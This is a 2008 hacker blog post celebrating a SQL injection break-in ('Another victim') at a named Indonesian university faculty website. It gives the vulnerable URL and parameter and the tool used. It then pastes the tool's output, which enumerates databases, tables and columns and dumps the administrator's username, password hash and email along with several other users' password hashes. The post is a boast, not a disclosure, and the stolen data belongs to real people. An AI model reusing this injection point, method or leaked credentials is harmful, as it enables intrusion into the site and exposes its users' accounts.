viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Thursday, September 18, 2008

[SQLi] http://www.fti-tarumanagara.or.id

9:20 PM Posted by viperfx07 No comments
Another victim :D

Website: http://www.fti-tarumanagara.or.id
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 12:02:19
[0]: 5.0.18-nt:root@localhost:dbfti

[-] 12:03:12
[-] Total URL Requests 220
[-] Done




[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 11:54:38
[+] Number of Rows: 24

[0]: Copy of dbskripsi
[1]: Copy of kp_db
[2]: Copy of labfti
[3]: alumniuntar
[4]: builderdb
[5]: cdcol
[6]: data
[7]: dbfti
[8]: dbseminar
[9]: dbskripsi
[10]: dbskripsi_onupdate
[11]: dbsnti
[12]: dbwebsitenews
[13]: helpdesk
[14]: kp_db
[15]: kp_db_test
[16]: labfti
[17]: mysql
[18]: nontemplatedb
[19]: phpmyadmin
[20]: templatedb
[21]: templateuserdb
[22]: test
[23]: webauth

[-] 12:02:28
[-] Total URL Requests 1787
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "dbfti"
[+] 12:03:25
[+] Number of Rows: 18

[0]: tbbanner
[1]: tbbidpenelitian
[2]: tbevents
[3]: tbfavlinks
[4]: tbjurnalilmiah
[5]: tbmatakuliah
[6]: tbmatakuliahpil
[7]: tbmatakuliahsilabus
[8]: tbmember
[9]: tbnews
[10]: tbormadetil
[11]: tbormagaleri
[12]: tbormamhs
[13]: tbpenelitian
[14]: tbpolling
[15]: tbpollingdetail
[16]: tbsitemap
[17]: tbstaff

[-] 12:20:36
[-] Total URL Requests 1552
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "dbfti" and Table "tbmember"
[+] 12:20:31
[+] Number of Rows: 9

[0]: user
[1]: pass
[2]: email
[3]: nama
[4]: tgl_lahir
[5]: jk
[6]: alamat
[7]: hp
[8]: type

[-] 12:27:52
[-] Total URL Requests 367
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "dbfti" Table "tbmember"
[+] Column(s) ['user', 'pass', 'email', 'type']
[+] 12:30:51
[+] Number of Rows: 1

[0]: admin:67e6d175480398b4c98842c648bceb4d:admin@fti-tarumanagara.or.id:Admin

[-] 12:36:10
[-] Total URL Requests 535
[-] Done



+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "builderdb" Table "user_account"
[+] Column(s) ['Username', 'Password']
[+] 13:13:10
[+] Number of Rows: 13

[0]: suryana:efd92f19bd78ab7e59775959c014f5aa
[1]: l3lyh:1cc56014cc296ef8cc6ffd2635d7c3dc
[2]: ria_yuni:9a2891b0b857317639a177bcda

0 comments:

Post a Comment